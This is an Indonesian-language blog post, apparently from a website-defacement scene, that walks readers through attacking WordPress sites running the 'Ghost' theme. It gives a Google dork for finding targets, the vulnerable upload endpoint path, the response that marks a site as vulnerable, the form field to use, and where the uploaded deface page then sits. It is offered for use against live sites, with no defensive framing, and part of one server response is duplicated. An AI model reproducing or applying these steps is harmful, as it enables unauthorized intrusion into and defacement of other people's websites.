Dork
- inurl:wp-content/theme/Ghost
Exploit
- /wp-content/themes/Ghost/included/uploadfile3/upload_settings_image.php
Karena gua baik jadi lu gua kasih live target
Pertama kalian ngedork dulu di google / chorome
Lalu masukkan exploit
Kalau vuln keluar tulisan " {"status":"NOK", "ERR":"This file is incorect"} "
Nahh kalau sudah keluar tulisan kaya gitu
Kalian masuk aja ke csrf
Di bagian post file kalian isi Filedata
Kalau udah kalian pencet kunci sempai
Habis itu kalian upload sc deface kalian
Pencet kunci sempai lagi
Kalau berhasil upload keluar tulisan " {"status":"OK","imageID":"nama file kalian html","imageName":"nama file kalian.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tasu.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"} "
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"} "
Cara manggil SC deface kalian " https://www.target.com/wp-content/uploads/settingsimages/sc deface kalian "
Kalau gk paham silahkan komen di kolom komentar
Tidak ada komentar:
Posting Komentar